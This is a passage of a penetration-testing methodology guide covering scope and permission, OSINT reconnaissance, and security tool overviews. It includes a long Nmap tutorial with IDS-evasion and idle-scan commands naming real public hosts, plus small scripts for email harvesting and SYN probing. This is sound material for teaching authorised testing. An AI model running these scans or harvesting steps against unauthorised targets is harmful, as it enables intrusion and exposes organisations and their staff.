
There are times where shunning is perfectly acceptable and there are times where it may not fit the spirit of the test. For example, if your test is to be a full black-box test where you are testing not only the technology but also the capabilities of the target organization's security team, shunning would be perfectly fine. However, when you are testing a large number of systems in coordination with the target organization's security team, it may not be in the best interests of the test to shun your attacks.

Permission to Test

This is quite possibly the single most important document you can receive when testing. It documents the scope, and it is where the customer signs off on the fact that they are going to be tested for security vulnerabilities and that their systems may be compromised. Further, it should clearly state that testing can lead to system instability and that all due care will be taken by the tester to not crash systems in the process. However, because testing can lead to instability, the customer shall not hold the tester liable for any system instability or crashes. It is critical that testing does not begin until this document is signed by the customer. In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud.

Legal Considerations

Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed. For example, any VOIP calls captured in the course of the penetration test may be considered wiretapping in some areas.
When tracking this information, be sure to collect time information. For example, if a scan is detected, you should be notified, and you should note what level of scan you were performing at the time.
Intelligence Gathering
This section defines the Intelligence Gathering activities of a penetration test. The purpose of this document is to provide a living reference designed specifically for the pentester performing reconnaissance against a target (typically corporate, military, or related). The document details the thought process and goals of pentesting reconnaissance and, when used properly, helps the reader to produce a highly strategic plan for attacking a target.
What it is
Intelligence Gathering is performing reconnaissance against a target to gather as much information as possible to be utilized when penetrating the target during the vulnerability assessment and exploitation phases. The more information you are able to gather during this phase, the more vectors of attack you may be able to use in the future. Open source intelligence (OSINT) is a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence.
Why do it
We perform Open Source Intelligence gathering to determine various entry points into an organization. These entry points can be physical, electronic, and/or human. Many companies fail to take into account what information about themselves they place in public and how this information can be used by a determined attacker. On top of that, many employees fail to take into account what information they place about themselves in public and how that information can be used to attack them or their employer.
What is it not
OSINT may not be accurate or timely. The information sources may be deliberately/accidentally manipulated to reflect erroneous data, information may become obsolete as time passes, or simply be incomplete. It does not encompass dumpster-diving or any methods of retrieving company information off of physical items found on-premises.
Target Selection
Identification and Naming of Target
When approaching a target organization, it is important to understand that a company may have a number of different top-level domains (TLDs) and auxiliary businesses. While this information should have been discovered during the scoping phase, it is not all that unusual to identify additional servers, domains, and companies that may not have been part of the initial scope that was discussed in the pre-engagement phase. For example, a company may have a TLD of .com. However, they may also have .net, .co, and .xxx. These may need to be part of the revised scope, or they may be off limits; either way, it needs to be cleared with the customer before testing begins. It is also not all that uncommon for a company to have a number of sub-companies underneath it. For example, General Electric and Procter & Gamble own a great many smaller companies.
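A quick way to check which sister TLDs actually resolve is sketched below; "example" is a placeholder for the in-scope base name, and any hits still need customer sign-off before they enter the test scope.

# Resolve sister TLD variants of a known base name.
import socket

BASE = "example"   # hypothetical in-scope company name
for tld in (".com", ".net", ".co", ".org", ".xxx"):
    domain = BASE + tld
    try:
        _host, _aliases, ips = socket.gethostbyname_ex(domain)
        print(f"{domain} -> {ips}")
    except socket.gaierror:
        pass   # does not resolve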
Consider any Rules of Engagement limitations
At this point it is a good idea to review the Rules of Engagement. It is common for these to get forgotten during a test. Sometimes, as testers, we get so wrapped up in what we find and the possibilities for attack that we forget which IP addresses, domains, and networks we can attack. Always be referencing the Rules of Engagement to keep your tests focused. This is not just important from a legal perspective; it is also important from a scope creep perspective. Every time you get sidetracked from the core objectives of the test, it costs you time. And in the long run that can cost your company money.
Consider time length for test
The amount of time for the total test will directly impact the amount of intelligence gathering that can be done. There are some tests where the total time is two to three months; in these engagements a testing company would spend a tremendous amount of time looking into each of the core business units and personnel of the company. However, for shorter crystal-box style tests the objectives may be far more tactical. For example, testing a specific web application may not require you to research the financial records of the company CEO.
Consider the end goal of the test.
Consider what you want to accomplish from the Information Gathering phase.
Make the plan to get it.
Open Source Intelligence (OSINT) takes three forms; Passive, Semi-passive, and Active.
Passive Information Gathering: Passive information gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform, as we are never sending any traffic to the target organization, neither from one of our hosts nor from anonymous hosts or services across the Internet. This means we can only use and gather archived or stored information. As such, this information can be out of date or incorrect, as we are limited to results gathered from a third party.

Semi-passive Information Gathering: The goal of semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information; we aren't performing in-depth reverse lookups or brute-force DNS requests; we aren't searching for unpublished servers or directories. We aren't running network-level portscans or crawlers, and we are only looking at metadata in published documents and files, not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem, the target may be able to go back and discover the reconnaissance activities, but they shouldn't be able to attribute the activity back to anyone.

Active Information Gathering: Active information gathering is likely to be detected by the target and flagged as suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans: nmap -p1-65535), actively enumerating and/or vulnerability scanning the open services, and actively searching for unpublished directories, files, and servers. Most of this activity falls into your typical reconnaissance or scanning activities for a standard pentest.
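As a small illustration of the semi-passive style, the sketch below resolves only the published domain name and fetches the public homepage the way a browser would; the domain is a placeholder. Anything beyond this (brute-force DNS, port scans) crosses into active gathering.

# Semi-passive probes should look like ordinary Internet traffic.
import socket
import urllib.request

DOMAIN = "example.com"   # hypothetical target
_host, _aliases, ips = socket.gethostbyname_ex(DOMAIN)
print(f"{DOMAIN} resolves to {ips}")

# Fetch the public page as a normal browser would and note the
# advertised server software, if any.
req = urllib.request.Request(f"http://{DOMAIN}/",
                             headers={"User-Agent": "Mozilla/5.0"})
with urllib.request.urlopen(req, timeout=10) as resp:
    print(resp.headers.get("Server", "no Server header"))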
Per-location listing of full address, ownership, and associated records (city, tax, legal, etc.); full listing of all physical security measures for the location (camera placements, sensors, fences, guard posts, entry control, gates, type of identification, suppliers' entrance, physical locations based on IP blocks/geolocation services, etc.).
Pervasiveness
It is not uncommon for a target organization to have multiple separate physical locations. For example, a bank will have central offices, but it will also have numerous remote branches. While physical and technical security may be very good at central locations, remote locations often have poor security controls.
Relationships
Business partners, customers, suppliers: analysis via what's openly shared on corporate web pages, rental companies, etc. This information can be used to better understand the business or organizational projects. For example, what products and services are critical to the target organization? This information can also be used to create successful social engineering scenarios.
Logical
Accumulated information for partners, clients and competitors: For each one, a full listing of the business name, business address, type of relationship, basic financial information, basic hosts/network information.
Business Partners
Business Clients
Competitors
Who are the target's competitors? This may be simple (Ford vs. Chevy) or may require much more analysis.
Touchgraph
A touchgraph (a visual representation of the social connections between people) will assist in mapping out the possible interactions between people in the organization, and how to access them from the outside (when the touchgraph includes external communities and is created with a depth level above 2). The basic touchgraph should reflect the organizational structure derived from the information gathered so far, and further expansion of the graph should be based on it (as it usually represents the focus on the organizational assets better and makes possible approach vectors clear).
Gathering a list of your target's professional licenses and registries may offer insight not only into how the company operates, but also into the guidelines and regulations that it follows in order to maintain those licenses. A prime example is a company's ISO certification, which can show that the company follows set guidelines and processes. It is important for a tester to be aware of these processes and how they could affect tests being performed on the organization. A company will often list these details on its website as a badge of honor. In other cases it may be necessary to search the registries for the given vertical in order to see if an organization is a member. The information that is available is very dependent on the vertical market, as well as the geographical location of the company. It should also be noted that international companies may be licensed differently and be required to register with different standards or legal bodies depending on the country.
Org Chart
Position identification
Document Metadata
What is it? Metadata or meta-content provides information about the data/document in scope. It can include information such as the author/creator name, time and date, standards used/referred to, location in a computer network (printer/folder/directory path, etc.), geo-tags and so on. For an image, the metadata can contain color depth, resolution, camera make/type and even the coordinates and location information.

Why would you do it? Metadata is important because it contains information about the internal network, user names, email addresses, printer locations, etc., and will help to create a blueprint of the location. It also contains information about the software used in creating the respective documents. This can enable an attacker to create a profile and/or perform targeted attacks with internal knowledge of the networks and users.

How would you do it? There are tools available to extract metadata from files (pdf/word/image), such as FOCA (GUI-based), metagoofil (Python-based), meta-extractor and exiftool (Perl-based). These tools are capable of extracting and displaying the results in different formats such as HTML, XML, GUI and JSON. The input to these tools is mostly a document downloaded from the public presence of the client, which is then analyzed to learn more about it. FOCA additionally helps you search for documents, then download and analyze them, all through its GUI interface.
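To illustrate the idea without any third-party tools, the short Python sketch below (the filename is a placeholder) pulls the author field out of a .docx file, which is simply a ZIP archive whose docProps/core.xml member carries creator and timestamp metadata:

    import re
    import zipfile

    # A .docx is a ZIP archive; docProps/core.xml holds the Dublin Core metadata
    with zipfile.ZipFile("report.docx") as doc:      # placeholder document name
        core = doc.read("docProps/core.xml").decode("utf-8")

    # Extract the creator (author) field -- often an internal username
    match = re.search(r"<dc:creator>(.*?)</dc:creator>", core)
    if match:
        print("Author:", match.group(1))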
Network blocks owned by the organization can be passively obtained by performing whois searches. DNSStuff.com is a one-stop shop for obtaining this type of information. Open source searches for IP addresses can yield information about the types of infrastructure at the target. Administrators often post IP address information in the context of help requests on various support sites.
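Since whois is a plain-text protocol on TCP port 43 (RFC 3912), even a few lines of Python can retrieve registration data without any dedicated tooling (the domain below is a placeholder):

    import socket

    def whois(query, server="whois.iana.org"):
        """Send a raw whois query: plain text over TCP port 43."""
        with socket.create_connection((server, 43), timeout=10) as sock:
            sock.sendall(query.encode() + b"\r\n")
            response = b""
            while chunk := sock.recv(4096):
                response += chunk
        return response.decode(errors="replace")

    print(whois("example.com"))  # placeholder domain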
Email addresses
E-mail addresses provide a potential list of valid usernames and reveal the domain structure. They can be gathered from multiple sources, including the organization's website.
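A minimal harvesting sketch in Python (standard library only; the URL is a placeholder) fetches a public page and extracts anything that looks like an e-mail address:

    import re
    import urllib.request

    # Placeholder page on the target's public website
    url = "http://www.example.com/contact"
    html = urllib.request.urlopen(url).read().decode(errors="ignore")

    # Simple e-mail pattern; good enough for reconnaissance purposes
    emails = set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html))
    print(sorted(emails))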
The target's external infrastructure profile can provide a wealth of information about the technologies used internally. This information can be gathered from multiple sources, both passively and actively. The profile should be used when assembling an attack scenario against the external infrastructure.
Technologies used
OSINT searches through support forums, mailing lists and other resources can gather information on the technologies used at the target. Social engineering can also be used against the identified information technology organization, as well as against product vendors.
Purchase agreements
Purchase agreements contain information about hardware, software, licenses and additional tangible assets in place at the target.
Remote access
Obtaining information on how employees and/or clients connect into the target for remote access provides a potential point of ingress. Oftentimes links to remote access portals are available from the target's home page, and "How To" documents reveal the applications and procedures remote users follow to connect.
Application usage
Gather a list of known applications used by the target organization. This can often be achieved by extracting metadata from publicly accessible files (as discussed previously).
Defense technologies
Fingerprinting defensive technologies can be achieved in a number of ways, depending on the defenses in place.
Passive fingerprinting
Search forums and publicly accessible information where technicians of the target organisation may be discussing issues or asking for assistance on the technology in use. Search marketing information for the target organisation as well as popular technology vendors. Using Tin-eye (or another image matching tool), search for the target organisation's logo to see if it is listed on vendor reference pages or marketing material.
Active fingerprinting
Send appropriate probe packets to the public-facing systems to test patterns in blocking. Several tools exist for fingerprinting specific WAF types. Header information, both in responses from the target website and within emails, often reveals not only the systems in use but also the specific protection mechanisms enabled (e.g. email gateway anti-virus scanners).
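As a minimal illustration of header-based fingerprinting (the URL is a placeholder), the following Python snippet requests a page and prints the response headers that most commonly leak server software and defensive middleware details:

    import urllib.request

    # Placeholder target URL
    resp = urllib.request.urlopen("http://www.example.com/")

    # Headers that frequently reveal server software and protective middleware
    for name in ("Server", "X-Powered-By", "Via", "X-CDN", "Set-Cookie"):
        if resp.headers.get(name):
            print(f"{name}: {resp.headers[name]}")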
Human capability
Discovering the defensive human capability of a target organization can be difficult. There are several key pieces of information that could assist in judging the security of the target organization.
Check for the presence of a company-wide CERT/CSIRT/PSRT team. Check for advertised jobs to see how often a security position is listed. Check for advertised jobs to see if security is listed as a requirement for non-security jobs (e.g. developers). Check for out-sourcing agreements to see if the security of the target has been outsourced partially or in its entirety. Check for specific individuals working for the company who may be active in the security community.
Financial Reporting
The target's financial reporting will depend heavily on the location of the organization. Reporting may also be made through the organization's head office and not for each branch office. What is it: EDGAR (the Electronic Data Gathering, Analysis, and Retrieval system) is a database of the U.S. Securities and Exchange Commission (SEC) that contains registration statements, periodic reports, and other information on all companies (both foreign and domestic) that are required by law to file.
Why do it: EDGAR data is important because, in addition to financial information, it identifies key personnel within a company who may not be otherwise notable from a company's website or other public presence. It also includes statements of executive compensation, names and addresses of major common stock owners, a summary of legal proceedings against the company, economic risk factors, and other potentially interesting data.
2.2 Pentest Tools
OpenVAS
OpenVAS is a vulnerability scanner that was forked from the last free version of Nessus after that tool went proprietary in 2005. OpenVAS plugins are still written in the Nessus NASL language. The project seemed dead for a while, but development has since restarted.
Core Impact
Core Impact isn't cheap (be prepared to spend at least $30,000), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. Other good options include Metasploit and Canvas.
Nexpose
Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. It is sold as standalone software, an appliance, virtual machine, or as a managed
service or private cloud deployment. User interaction is through a web browser. There is a free "community edition" for scanning up to 32 IPs, as well as Express ($3,000 per user per year), Express Pro ($7,000 per user per year) and Enterprise (starts at $25,000 per user per year) editions.
GFI LanGuard
GFI LanGuard is a network security and vulnerability scanner designed to help with patch management, network and software audits, and vulnerability assessments. The price is based on the number of IP addresses you wish to scan. A free trial version (up to 5 IP addresses) is available.
QualysGuard
QualysGuard is a popular SaaS (software as a service) vulnerability management offering. Its web-based UI offers network discovery and mapping, asset prioritization, vulnerability assessment reporting and remediation tracking according to business risk. Internal scans are handled by Qualys appliances which communicate back to the cloud-based system.
MBSA
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week.
Secunia PSI
Secunia PSI (Personal Software Inspector) is a free security tool designed to detect vulnerable and out-dated programs and plug-ins that expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus programs. Secunia PSI checks only the machine it is running on, while its commercial sibling Secunia CSI (Corporate Software Inspector) scans multiple machines on a network.
Nipper
Nipper (short for Network Infrastructure Parser, previously known as CiscoParse) audits the security of network devices such as switches, routers, and firewalls. It works by parsing and analyzing device configuration files, which the Nipper user must supply. This was an open source tool until its developer (Titania) released a commercial version.
SAINT
SAINT is a commercial vulnerability assessment tool. Like Nessus, it used to be free and open source but is now a commercial product. Unlike Nexpose and QualysGuard, SAINT runs on Linux and Mac OS X. In fact, SAINT is one of the few scanner vendors that don't run on Windows at all.
Nessus
Nessus is an automatic vulnerability scanner that can detect most known vulnerabilities, such as misconfigurations, default passwords, unpatched services, etc.

Pros and Cons of Nessus: Pros: a. Free vulnerability scanning. b. Checks for effectiveness of patching. Cons: a. Some GUI issues still arise. b. Less open than it was. c. Definitely appears hostile when used.

Nessus vs Retina - Vulnerability Scanning Tools Evaluation

The Test Environment: The tested vulnerability scanning tools were installed on a Windows 7 Pro PC.

The Scanning Process: Both scanners were started with settings on full port scan, with scanning safety disabled, and all available plugins activated. NOTE: Since Retina does not have Web Application Analysis, Nessus was run twice, once with WebApplications disabled and once with WebApplications enabled, in order to do a meaningful performance comparison.

Performance: The Nessus scanner without the WebApplication scan took 8 minutes to complete the scan. The Nessus scanner with the WebApplication scan took 67 minutes to complete the scan. The Retina scanner took 38 minutes to complete the scan.
Results
Both scanners failed to identify the target operating system. The Nessus scanner identified the expected open ports and concluded that MySQL does not accept connections from unauthorized IPs; on a repeat scan, it regenerated the same results. The Retina scanner identified HTTP and TCP port 631 (IPP printer sharing). It did not identify the MySQL port as open. On the web server, it identified a significant number of vulnerabilities, but did not collect any information from the HTTP server. On a repeat scan it missed the HTTP port and only identified the MySQL port. The Nessus scanner running the WebApplication scanning repeated the previous results, additionally identified a significant number of WebApp vulnerabilities, and collected information from HTTP through web mirroring.
Conclusions: Both scanners performed vulnerability identification very well, but both missed the OS identification. Both also manifested flaws: 1. Nessus missed the IPP port every time. 2. Retina manifested erroneous scan results, identifying different ports and vulnerabilities during different sessions, while no configuration changes were made to the test environment. In terms of speed, without the WebApplication scan Nessus performed much faster than Retina; on the other hand, with the WebApplication scan active, Nessus was much slower than Retina. In terms of scan depth, Nessus has a small advantage, since it includes a web mirroring tool that is very helpful with HTTP. It can be clearly concluded that these tools cannot be used as the sole source of information when performing a vulnerability test. One must also utilize network mapping (NMAP, LanGuard), OS identification (NMAP) and specific application vulnerability scanners (ParosProxy, WebScarab for the Web) for maximum effect. In a direct comparison, Nessus wins because: 1. Retina manifested erroneous results on repeat scans; 2. the Nessus package includes a WebApplication scanning module, which in eEye products must be purchased as a separate application.
NMAP
NMAP is primarily a host detection and port discovery tool. Instead of using Nessus to look for specific vulnerabilities against a known quantity of hosts, NMAP discovers active IP hosts using a combination of probes. Once a network scan is done, you can have NMAP look at specific hosts for open ports. NMAP can also attempt to gather additional information about the open ports such as finding out the version of a database running on one of your servers, but its bread
and butter is really host detection and port scanning. One huge benefit of NMAP's open source roots is that it includes a scripting engine that allows users to create complex NMAP scripts. Scripts are broken into several categories, including auth (attempts brute-force attacks against authentication), discovery, intrusive, and malware (which looks for malware-infected machines).
Pros and Cons of NMAP: Pros: 1. Fastest. 2. Much more reliable OS and application version info. 3. Accepts IP address ranges, lists and file formats. 4. Front end available for the command-line inhibited.
Cons: 1. Scanning may be considered hostile. 2. SYN scans have been known to crash some systems.
A Simple Guide to Nmap Usage: What is Nmap? It is short for Network Mapper. It is a free port scanner, released under the GNU GPL, written by Fyodor with contributions from around the world. It is a simple, fast and very effective port scanner. It has gone through lots of changes and is certainly the best one, with more and more features added. A recent addition is version scanning, which is very crucial when assessing networks. It is the port scanner of choice: administrators, hackers, crackers, script kiddies and many more use it. It is released under the GPL and was first written on Linux; somewhat surprisingly, even Microsoft has included it in its auditing tools list and recommends using nmap for scans. A great thing about Nmap is that many people have also put effort into porting it to other platforms like Windows, BSD and Mac OS, successfully, so you can run it on almost any platform. It supports many types of scans, different types of flags are used, and the results are brief and easy to interpret.
TCP Connect Scan: This is the simplest form of scanning. It connects to every port on the target machine and lists the open ones. The idea behind this kind of scanning is simple: if the port on the target machine is open and accepting connections, the connect() will succeed, and if the port is not listening, it is considered closed. For unix users with lower privileges this is the default scanning option. It can be very useful, as it is fast and the parallel scanning option can be used with a TCP connect scan. But this type of scanning has its own demerits: it can be easily detected and filtered, and it also shows up in lots of connection logs. An example of this is:
#nmap -sT 192.168.0.1

TCP SYN Scan: This type of scanning is also called half-open scanning, as a full TCP connection is not made to the target port. In this type of scan, first a SYN packet is sent to the port, as if a real connection is going to be established. If the port is open and listening, it sends back a SYN|ACK, which is the indication that the port is open; if we get an RST back, it means that the port is not listening and it is closed. If we get a SYN|ACK back, we immediately send an RST packet, which tears down the half-open connection. This type of scanning has the advantage that only a few systems monitor and log these scan attempts. A demerit of this technique is that you need to be root to forge SYN packets. An example of this is:

#nmap -sS 192.168.0.1

TCP FIN, Xmas and Null Scans: Sometimes it is not enough to use SYN scans, as they can be detected by packet filters watching for SYN packets sent to unlikely ports. FIN, Xmas and Null scans are able to bypass this type of filtering. In this technique, when a FIN packet is sent to an open port, the open port ignores the packet, while a closed port immediately sends back an RST packet, which tells nmap which ports are open and which are closed. This type of scanning has its own merits and demerits: it is not effective against Microsoft platforms, where every port replies with an RST whenever a FIN packet is sent, but this behavior can in turn be used to discover that the system is Microsoft-based. Examples of these are:
#nmap -sF 192.168.0.1 <= This is a FIN Scan
#nmap -sX 192.168.0.1 <= This is an Xmas Scan
#nmap -sN 192.168.0.1 <= This is a Null Scan
Ping Scan: Sometimes you just want to know which systems are up, and this is the scan method most likely to be used to determine that. It works by sending ICMP echo packets to all the hosts specified; all those hosts that respond to these packets are up. But sometimes ICMP echo packets are blocked, and then this method fails to pick up systems that are alive. Nmap is much smarter in this respect and has an option which sends a TCP ACK packet to the target system (by default this port is set to 80); if the system responds with an RST packet, this is an indication that the system is up. A third technique sends a SYN packet and awaits an RST or SYN|ACK packet, which indicates the system is up. An example of this is:

#nmap -sP 192.168.0.1
UDP Scan: This type of scanning is used to determine which UDP ports are open on the target host. In this type of scan a 0-byte UDP packet is sent to each of the specified ports on the target machine; if we get ICMP unreachable back, the port is assumed to be closed, or else it is considered open. A demerit is that ISPs often block these responses, so the scan sometimes reports ports as open when in fact they are not, so you need to treat these results with some caution. An example of this is:

#nmap -sU 192.168.0.1

Version Detection Scan: A recent addition to Nmap is version detection, which determines the service running and the version number of the daemon. It is really very useful, as it shows the versions in use and can thus reveal old and vulnerable daemons; this is usually where vulnerability scanners come in, but nmap achieves much of it through the version detection technique alone (if you are really an nmap geek, you may hardly need a vulnerability scanner). In this type of scan a service fingerprint is taken from the daemon and compared to nmap's database of fingerprints; when it matches, we know for sure what service is running.
An example of this is :-
#nmap -sV 192.168.0.1

Protocol Scan: This technique is used to find out which IP protocols are supported on the target host. It works by sending raw IP packets, without any protocol header, for each protocol to the target host. Nmap probes for 256 protocol types; it is in fact time consuming, but it is useful here and there. An example of this is:

#nmap -sO 192.168.0.1

Ack Scan: This type of scanning is used to map out firewall rulesets. It can determine whether the firewall is stateful or just a packet filter that blocks incoming SYN packets. In this type of scan an ACK packet is sent to the port; if it replies with an RST, the port is classified as unfiltered, and if no reply is returned, it is classified as filtered. An example of this is:
#nmap -sA 192.168.0.1

List Scan: This is used to generate a list of IP addresses without actually pinging or scanning them; a DNS resolution is also performed in this type of scan. An example of this is:

#nmap -sL yahoo.com

RPC Scan: This type of scan uses a number of port scanning techniques. It takes all the TCP and UDP ports found and floods them with SunRPC program NULL commands to determine whether they are RPC services; it also grabs the version number. An example of this is:

#nmap -sR 192.168.0.1

Idle Scan: This type of scan is a truly blind scan, which means that no packet is sent from your own IP address. Instead another host, often called a zombie, is used to scan the target machine and determine the open ports. This is done by predicting the sequence numbers of the zombie host and using that host to scan the target; if the target machine checks the IP of the scanning party, the IP of the zombie machine will show up. It is best to use this technique late at night when the zombie is idle, to get the best results. There is a very nice paper written on idle scanning available from SecurityFocus, and there is also an exclusive paper on idle scanning with nmap at insecure.org. This type of scan also helps us map out the trust relationships between hosts, which is crucial for spoofing attacks. An example of this is:

#nmap -sI zombie.yahoo.com mail.yahoo.com

Window Scan: This type of scan is very similar to ACK scanning. It is used to map out open and closed ports, and filtered and unfiltered ports, thanks to an anomaly in TCP window size reporting by different operating systems. The majority of *nix operating systems exhibit this behavior. An example of this is:

#nmap -sW 192.168.0.1

Different Types of Flags used in Scanning:

-P0: If this flag is used, pinging the host is skipped during scanning. This is useful in many cases, as some servers ignore ICMP echo requests; the host is then scanned without first discovering it with ping. A TCP ACK ping can also be combined with this flag, like -PT80.
-PT: This flag is used to determine which hosts are up when ICMP echo reply packets are blocked. A TCP ACK packet is sent to the target network, and if a host replies with an RST it is up, or else it is considered down.
-PS: This flag uses SYN packets instead of ACK packets; constructing these packets is limited to root users. All hosts that respond with an RST or SYN|ACK are up, and if nothing comes back, the host is assumed to be down.
-O: This flag is used to identify the target operating system. This is done by comparing nmap's stored fingerprint database with the fingerprints generated by the host. This technique can also calculate the uptime of the computer and is used to determine TCP sequence predictability. -f: This flag is used to evade intrusion detection systems and packet filtering systems; it can be combined with the SYN, FIN, NULL and Xmas scan options. Packets are broken into tiny fragments which are hard for IDSs and packet filters to detect.
-v: This flag indicates verbose output, meaning nmap will print information on what is going on during the scan. It can be used twice (-vv) to get even more information.
-p: This flag is used to specify the custom port numbers you want to scan; multiple ports can be separated using commas. An example of this is:

#nmap -sT -p 21,23,80,139,6000 192.168.0.1

-F: This flag is used for fast scanning. When this flag is used, only the ports listed in the nmap services file are scanned, which is what makes the scan very fast.

-M: This flag is used to specify the maximum number of sockets to be used for parallel scanning.
-T: This flag is used to specify the timing policy for the scan. Careful timing can be used to evade intrusion detection systems, or, at the other extreme, to make them start shouting :D. There are six timing options:

Paranoid: This type is very slow and is very handy for evading IDS.
Sneaky: This is similar but waits only 15 seconds between sending packets.
Polite: This type helps to ease the load on the network.
Normal: This is the normal scanning behavior.
Aggressive: This type makes the scan a bit faster.
Insane: This type is the quickest scan, and it triggers IDSs.
Examples Of Scanning :-
#nmap -sS -v 192.168.0.1
#nmap -sT -v 192.168.0.1
#nmap -sS -sV -v 192.168.0.1
#nmap -sT -sV -v 192.168.0.1
#nmap -sT -sV -v -P0 192.168.0.1
#nmap -sP -v 192.168.0.1-255
#nmap -PT80 -vv 192.168.0.1-255
#nmap -sF -vv 192.168.0.1
#nmap -sO -sV 192.168.0.1
#nmap -sI -P0 zombie.myhost.com yourhost.com
#nmap -sT -sV -p 21,23,79,80 192.168.0.1
#nmap -sT -sV -T Paranoid 192.168.0.1
#nmap -sT -P0 -T Insane -M 10 192.168.0.1
Metasploit
Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. One free extra is Metasploitable, an intentionally insecure Linux virtual machine you can use for testing Metasploit and other exploitation tools without hitting live servers. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less). The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage. Pros and Cons of Metasploit: Pros: a. Growing community of users. b. Growing documentation. c. Excellent tools to identify and exploit vulnerabilities. Cons: a. Do not expect all exploits to be up to date with the latest exploits. b. Lack of logging or reports. c. A machine running Metasploit can itself be compromised. d. It can be a dangerous tool and may violate policy at your organization.
Aircrack
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. The suite comprises over a dozen discrete tools, including airodump (an 802.11
packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
BackTrack
This excellent bootable live CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc.
Burp Suite
Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. All of the tools share the same framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting and extensibility. There is a limited free version and also Burp Suite Professional ($299 per user per year). Pros and Cons of Burp Suite Pro: Pros: a. As a manual test tool it is top rated. Cons: a. It lacks JavaScript support, which is a very big limitation.
Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
Hping
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Unfortunately, it hasn't been updated since 2005. The Nmap Project created and maintains Nping, a similar program with more modern features such as IPv6 support, and a unique echo mode.
W3AF
W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation plugins. In some ways it is like a web-focused Metasploit.
Scapy
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. Note that Scapy is a very low-level tool: you interact with it using the Python programming language. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more.
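As a brief illustration (assumes the third-party scapy package and root privileges; the address is a placeholder), the sketch below hand-crafts a single SYN probe and inspects the reply, the same half-open technique behind nmap's -sS scan:

    from scapy.all import IP, TCP, sr1  # third-party: pip install scapy

    target = "192.168.0.1"  # placeholder address

    # Send one SYN to port 80 and wait for a single reply (needs root)
    reply = sr1(IP(dst=target)/TCP(dport=80, flags="S"), timeout=2, verbose=0)

    if reply is None:
        print("filtered (no response)")
    elif reply.haslayer(TCP) and reply[TCP].flags == 0x12:  # SYN|ACK
        print("port 80 open")
    else:
        print("port 80 closed or reset")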
Ping/Telnet/Dig/Traceroute/Whois/netstat
While there are many advanced high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although more advanced functionality is available from Hping and Netcat.
Hydra
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.
Acunetix
